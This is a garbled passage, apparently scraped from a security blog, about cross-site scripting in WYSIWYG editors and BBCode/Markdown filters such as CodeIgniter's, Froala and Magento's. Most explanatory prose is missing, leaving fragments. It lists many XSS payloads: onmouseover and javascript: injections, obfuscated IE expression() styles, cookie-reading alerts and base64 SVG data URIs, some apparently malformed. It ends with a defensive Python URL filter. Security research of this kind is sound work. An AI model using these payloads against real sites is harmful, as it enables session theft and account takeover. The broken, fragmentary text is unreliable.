h4cksc4n.files.wordpress.com: Here, from CKEditor on the eBay site.
( XSS )
XSS vulnerabilities in web applications
XSS XSS XSS cross-site scripting vulnerabilities MALWARE
XSS XSS
:
1. wysiwyg
2. Magento Commerce Bug
3. WYSIWYG
4. WYSIWYG
5. ( Attack Vector #1 )
6. ( Attack Vector #2 )
7. Attribute Context
8. URL Context
9. Twitter Translations
10. Style Context
11. WYSIWYG
12. XSS
13.
14. Data URL
15.
WYSIWYG
What You See Is What You Get
: WYSIWYG
1)
2)
3)
4)
5)
6)
7) .....
XSS WYSIWYG Enterprise TinyMCE Editlive Lithium Jive TinyMCE PHP HTML Editor markUp FreeTextBox Froala Editor Eirte CKEditor ...
WYSIWYG Magento Commerce XSS 1000 $ http://magento.com/security
2051362 334227 448284 http://www.magentocommerce.com/boards/
Bold [b] html 4 [color=blue] [size=4]
[b][size=4][color=blue]bold[/size][/color][/b]
HTML
bold
bold Preview
document.cookie Removed
[removed] XSS
CodeIgniter's CI_Security PHP XSS document.cookie Removed
CodeIgniter
GitHub PHP . CodeIgniter 264038
[b][size=4][color=blue]bold[/size][/color][/b]
[b/onmouseover=alert(1)][size=4][color=blue]bold[/size][/color][/b]
And/or
[b onmouseover=alert(1)][size=4][color=blue]bold[/size][/color][/b]
" [b/onmouseover=alert(1)]"
bold
" [b onmouseover=alert(1)]"
bold
HTML URL URI JAVASCRIPT DATA URI
[url=http://www.bbcnews.com]Top Stories[/url]
[url=javascript:alert(1)]Top Stories[/url]
DATA URI
[url=data:text/html;base64.PHN2Zy9vbmxvYWQ9YwxIcnQoMik+]Top Stories[/url]
URL
alert(1)]Top Stories
Top Stories
URL http:// https:// absolute URL Relative URL CodeIgniter "Removed" http: DATA URL
JAVA EXPRESSION
[b][size=4][color=blue]bold[/size][/color][/b]
EXPRESSION
[b][size=4][color=width:expression(alert(1))]bold[/size][/color][/b]
alert(1))]bold
""Removed
[b][size=4][color=blue]bold[/size][/color][/b]
[b][size=4][color=width:expre/**/ssion(alert(1))]bold[/size][/color][/b]
bold
CodeIgniter expre ssion Removed codeIgniter's black-listed Style .
Color Style HTML Color
[b][size=4][color=blue]bold[/size][/color][/b]
[b][style=width:expre/**/ssion(alert(1))]bold [/style] [/b]
bold
style class Style Context style
[b][style=style=width:expre/**/ssion(alert(1))]bold[/style][/b]]
bold
class style Class
[b][style="style=width:expre/**/ssion(alert(1))]bold[/style][/b]]
bold
bold
IE7 eventHandler
[b][style="onmouseover="alert(cookie);]bold[/style][/b]
cookie document.cookie CodeIgniter ""removed document.cookie cookie xss
https://support.mozilla.org/en-US/kb/cookies-information-websites-store-on-your-computer
PHPSESSIONID HTTPONLY SECURE vBulletin 2014 ubuntu forums Apple Developers forums
md5 www-data vBulletin
https://www.youtube.com/watch?v=blDzqctIU2E
https://www.youtube.com/watch?v=TYcP3FbK3X4
xss wordpress 3.x
https://www.youtube.com/watch?v=7K15yzSeIGo
Content Management Systems(CMS) Drupal WordPress Magento JetSpeed ....
WYSIWYG :-
:
URL
ID , CLASS
WYSIWYG
( Attack Vector #1 ) :
http://xssplayground.net23.net/xss%22onmouseover=%22alert(1);%20imagefile.svg
http://xssplayground.net23.net/xss"onmouseover="alert(1); imagefile.svg
xss img
URL Decoder Explicit Server Side Decoding Decoder " "
http://xssplayground.net23.net/xss%22onmouseover=%22alert(1);%20imagefile.svg?"onmouseover="alert(1)
URL
! !
!Image URL Goes Here!
decoder " encode
Store XSS
Stored XSS reflected XSS stored XSS Kindle Direct Publishing (break context)
( Attack Vector #2 ) :
URL IMG A Data:image SVG XML
data:image/svg+xml;base64,PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz4gCjwhRE9DVFlQRSBodG1sIFsgCjwhRU5USVRZIHhzcyAiJiM2MDtzY3JpcHQmIzYyO2NvbmZpcm0obG9jYXRpb24pJiM2MDsvc2NyaXB0JiM2MjsiPiAKXT4gCjxodG1sIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hodG1sIj4gCjxoZWFkPiAKPHRpdGxlPlhNTCBYU1MgVmVjdG9yPC90aXRsZT4gCjwvaGVhZD4gCjxib2R5PiAKJnhzczsgCjwvYm9keT4gCjwvaHRtbD4=
svg jpg png Torjan_horse.jpg
http://www.ieee-security.org/images/new-web/Torjan_horse.jpg?onmouseover=alert(1)
http://xssplayground.net23.net/xss%22onmouseover=%22alert(1);%20imagefile.svg
Alt id class ALT
Jive
img :
firefox 33.0
Attribute Context
( )
// Context Name Attribute
// Context Value Attribute
JAVASCRIPT URL
xhtml XHTML alt , class , id , src,
IE8
Github
Online
URL Context
URL
LOCATION Action XSS CSRF SSRF
:
:
URI javascript
URL Javascript
(with encoding / obfuscation: URL encoding, HTML5 entity encoding, hex encoding, decimal encoding)
Data URI
Data-Base64 URL URL Base64 URI data is hidden 100
Vbscript
onmouseover=alert(1)
FreeTextBox WYSIWYG Asp.net
FreeTextBox
PHP HTML Hp Liberal.ca PHP JQUERY Joomla , Dojo Joomla Dojo Editor html Asp.net Asp Cute Cute 10000 60 XSS 10000
Web Wiz EditLive https://www.webwiz.co.uk/companyinfo/customer-testimonials.htm
MarkitUp
http://ephox.com/customers
Twitter Translations
https://twitter.com/ - automatic!
[Tiwtter](https://twitter.com/)
[] Tiwtter () URL
[Tiwtter](javascript:alert(1))
Data URI vb script uri encoding html
[twitter](javascript:alert(1))
Amp entity html encoding URL encoding
[Tiwtter](javascript:alert%281%29)
3rd party libraries WYSIWYG MarkDown
http://daringfireball.net/projects/markdown/dingus
Style Context
CSS style style html html xml xslt
Online
()
:
URI ie Expression Css
hex encoding encoding decimal html encoding ie
\ xss
CKEditor ebay
TinyMCE Expression Expr/**/ession ie Expression
URL DATA URI
data:text/html;base64.PHN2Zy9vbmxvYWQ9YwxIcnQoMik+
xss innerHTML
onmouseover=alert(1)
() IE 8 innerHTML :
div layer
click
:
Attacking well-secured web-applications by using innerHTML Mutations (CCS 2013)
WYSIWYG (Attacking Insert/Edit/Upload File Feature of WYSIWYG)
Drop file name
XSS
IMPERAVI Redactor
http://imperavi.com/redactor/
XSS Froala
Demo(Issue Fixed)
http://jsfiddle.net/7qgt9wrw/3/
HTTPONLY HTTP / HTTPS
PAYPAL
Froala :
javascript:alert(1) data:text/html;base64.PHN2Zy9vbmxvYWQ9YwxIcnQoMik+
http://www.ieee-security.org/images/new-web/Torjan_horse.jpg?onmouseover=alert(1)
image title innerHtml
onmouseover=alert(1)
WYSIWYG (Attacking Insert video Feature of Wysiwyg Editors)
Object embed onmouseover
Youtube Froala Raptor
....
object , embed HTML
XSS
xss
framework
... xss
XSS
HttpOnly flag
plugin
HttpOnly AJAX
HttpOnly document.cookie Dom Property AJAX
AJAX ( GET POST )
AJAX AJAX HttpOnly
https://www.isecur1ty.org/%D8%B4%D8%B1%D8%AD-%D8%AB%D8%BA%D8%B1%D8%A7%D8%AA-blind-xss
XSS DOM
https://www.security4arabs.com/2014/01/12/dombased-xss-vulnerabilities
flag Secure
https sidejacking session id cookie http https Secure CPU
XSS 1000$
http://demo.chmsoftware.com/7fc785c6bd26b49d7a7698a7518a73ed/
81570 catch all
:
1
str_replace($bad_chars, $safe_chars, $input): every character listed in $bad_chars (such as " and ') that occurs in $input is replaced with the corresponding entry in $safe_chars, i.e. its HTML-encoded string.
encoding encoding :
http://jsfiddle.net/9t8UM/3/
Demo fields (each one reflects into a div layer):
Hard coded double quotes in order to break the attribute context
Decimal Encoded Double Quotes
Hex Encoded Double Quotes
URL Encoded Double Quotes
HTML5 Encoded Double Quotes
Unicode Encoded Double Quotes
Encoding decoding Encoding Explicit Server Side Decoding
2 :
Style
" '
ie
\\ \\
< style
:
Injection here
alert(1)
: ;
3 :
URL Context
http https ftp : // " , ' \
http://jsfiddle.net/hfot8ruq/
pipeline
This is normal text - and this is bold text.
This is normal text - and this is bold text.
Output Reflects Here:
Filter has catch your awesome vector ... Try hard :(
data:image/svg+xml;base64,PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz4gCjwhRE9DVFlQRSBodG1sIFsgCjwhRU5USVRZIHhzcyAiJiM2MDtzY3JpcHQmIzYyO2NvbmZpcm0obG9jYXRpb24pJiM2MDsvc2NyaXB0JiM2MjsiPiAKXT4gCjxodG1sIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hodG1sIj4gCjxoZWFkPiAKPHRpdGxlPlhNTCBYU1MgVmVjdG9yPC90aXRsZT4gCjwvaGVhZD4gCjxib2R5PiAKJnhzczsgCjwvYm9keT4gCjwvaHRtbD4=
.
Data URL
http https Content-type binary html xml YAML Content-type mime/type Character set charset=UTF-8 ascii code non-ascii code
URL Data
data:[<mediatype>][;base64],<data>
mediatype mime/type text/plain;charset=US-ASCII URL encoding Hex encoding svg svg
data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 512 512'%3E%3Cpath d='M224%20387.814V512L32 320l192-192v126.912C447.375 260.152 437.794 103.016 380.93 0 521.287 151.707 491.48 394.785 224 387.814z'/%3E%3C/svg%3E
SVG
svg11.dtd
URL Encoding
%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20viewBox%3D%220%200%20512%20512%22%3E%3Cpath%20d%3D%22M224%20387.814V512L32%20320l192-192v126.912C447.375%20260.152%20437.794%20103.016%20380.93%200%20521.287%20151.707%20491.48%20394.785%20224%20387.814z%22%2F%3E%3C%2Fsvg%3E
base64 Encoding
PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHZpZXdCb3g9IjAgMCA1MTIgNTEyIj48cGF0aCBkPSJNMjI0IDM4Ny44MTRWNTEyTDMyIDMyMGwxOTItMTkydjEyNi45MTJDNDQ3LjM3NSAyNjAuMTUyIDQzNy43OTQgMTAzLjAxNiAzODAuOTMgMCA1MjEuMjg3IDE1MS43MDcgNDkxLjQ4IDM5NC43ODUgMjI0IDM4Ny44MTR6Ii8+PC9zdmc+
DATA URL
data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHZpZXdCb3g9IjAgMCA1MTIgNTEyIj48cGF0aCBkPSJNMjI0IDM4Ny44MTRWNTEyTDMyIDMyMGwxOTItMTkydjEyNi45MTJDNDQ3LjM3NSAyNjAuMTUyIDQzNy43OTQgMTAzLjAxNiAzODAuOTMgMCA1MjEuMjg3IDE1MS43MDcgNDkxLjQ4IDM5NC43ODUgMjI0IDM4Ny44MTR6Ii8+PC9zdmc+
URL Encoding
data:image/svg+xml,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20viewBox%3D%220%200%20512%20512%22%3E%3Cpath%20d%3D%22M224%20387.814V512L32%20320l192-192v126.912C447.375%20260.152%20437.794%20103.016%20380.93%200%20521.287%20151.707%20491.48%20394.785%20224%20387.814z%22%2F%3E%3C%2Fsvg%3E
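The URL-context filtering recommended above (accept only absolute http, https or ftp links and reject quotes and backslashes) combined with the data:[<mediatype>][;base64],<data> syntax, as an added Python example; this is not code from the slides or from any editor they name. The allowed scheme and media type sets, the function names and the sample inputs are assumptions chosen for illustration.

```python
import base64
import binascii
import html
import re
from urllib.parse import unquote

# Schemes the link/image filter accepts (recommendation 3 on the slides: absolute http/https/ftp only).
ALLOWED_SCHEMES = {"http", "https", "ftp"}
# Raster image types that may be embedded from a data: URL; SVG is excluded because it can carry <script>.
ALLOWED_DATA_TYPES = {"image/png", "image/jpeg", "image/gif"}


def parse_data_url(url):
    """Split 'data:[<mediatype>][;base64],<data>' (RFC 2397) into (mediatype, is_base64, bytes), or None."""
    m = re.match(r"^data:([^,]*),(.*)$", url, re.DOTALL)
    if not m:
        return None                                   # no comma: not a well-formed data URL
    params = m.group(1).split(";")
    mediatype = (params[0] or "text/plain").lower()   # RFC default when the type is omitted
    is_b64 = "base64" in [p.strip().lower() for p in params[1:]]
    try:
        data = base64.b64decode(m.group(2), validate=True) if is_b64 else unquote(m.group(2)).encode()
    except (binascii.Error, ValueError):
        return None
    return mediatype, is_b64, data


def check_url_context(raw):
    """Return (accepted, reason) for a URL that will land in an href/src attribute."""
    url = unquote(raw).strip()                        # judge the decoded form: %22 is still a quote
    if any(c in url for c in "\"'\\"):                # characters that break out of a quoted attribute
        return False, "quote or backslash in URL"
    scheme = url.split(":", 1)[0].lower() if ":" in url else ""
    if scheme == "data":
        parsed = parse_data_url(raw.strip())          # parse the raw form; encoded headers are rejected
        if parsed is None:
            return False, "malformed data URL"
        if parsed[0] not in ALLOWED_DATA_TYPES:
            return False, "data URL media type not allowed: " + parsed[0]
        return True, "data image"
    if scheme not in ALLOWED_SCHEMES or not url.lower().startswith(scheme + "://"):
        return False, "scheme not allowed: " + (scheme or "(none)")
    return True, "ok"


def attr_encode(value):
    """Encode a value for a double-quoted HTML attribute: the output-side half of the fix."""
    return html.escape(value, quote=True)
```

Input-side scheme checks never replace attribute encoding at output: a URL such as the Trojan_horse.jpg?onmouseover=alert(1) example passes the scheme check and is harmless only because the attribute it lands in is quoted and encoded by attr_encode.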
svg xml
xml cloud office
XML xml JSON javascript object notation data type encoding
xml
Xml Markup xhtml Markup markup html
XML SpagoBI () .... XML Talend , ! XML
XML XHTML XSL SVG :
Common DOCTYPE Declarations
https://www.w3.org/QA/2002/04/valid-dtd-list.html
Base 64 Encoding
Base 10 uses the digits 0-9; base 16 uses 0-9 and A-F; base 64 uses A-Z, a-z, 0-9, + and /, all printable ASCII characters.
base 64 binary audio Json string java script object notation
base 64 decoding spamming anti-spamming
Json base 64 encoding Json base 64
( base 64 encoding Image ) png jpg svg data URL Base64 base64_encode()
<svg xmlns="http://www.w3.org/2000/svg" width="100" height="100">
  <rect id="square" width="100" height="100" fill="#ff0000"/>
  <script><![CDATA[
  confirm(1);
  // set element onclick event handler
  window.onload = function () {
    var square = document.getElementById("square");
    // onclick event handler: toggle the square's fill colour
    square.onclick = function () {
      var color = this.getAttribute("fill");
      if (color == "#ff0000") {
        this.setAttribute("fill", "#0000ff");
      } else {
        this.setAttribute("fill", "#ff0000");
      }
    };
  };
  ]]></script>
</svg>
svg CDATA entity xhtml
Accessing Inline SVG
SVG
<script>
// add the "svg" class to <html> when the browser supports SVG images
if (document.implementation.hasFeature("http://www.w3.org/TR/SVG11/feature#Image", "1.1")) {
  document.documentElement.className = "svg";
}
</script>
<style>
img { width: 18.75em; height: 6.25em; }
img.svg { display: none; }
img.png { display: inline; }
html.svg img.svg { display: inline; }
html.svg img.png { display: none; }
</style>
svg
http://voormedia.com/blog/2012/10/displaying-and-detecting-support-for-svg-images
Svg html 5 SVG
http://edutechwiki.unige.ch/en/Using_SVG_with_HTML5_tutorial#Embeding_SVG_in_HTML_5_with_the_object_tag
https://www.owasp.org/images/0/03/Mario_Heiderich_OWASP_Sweden_The_image_that_called_me.pdf
https://h4cksc4n.wordpress.com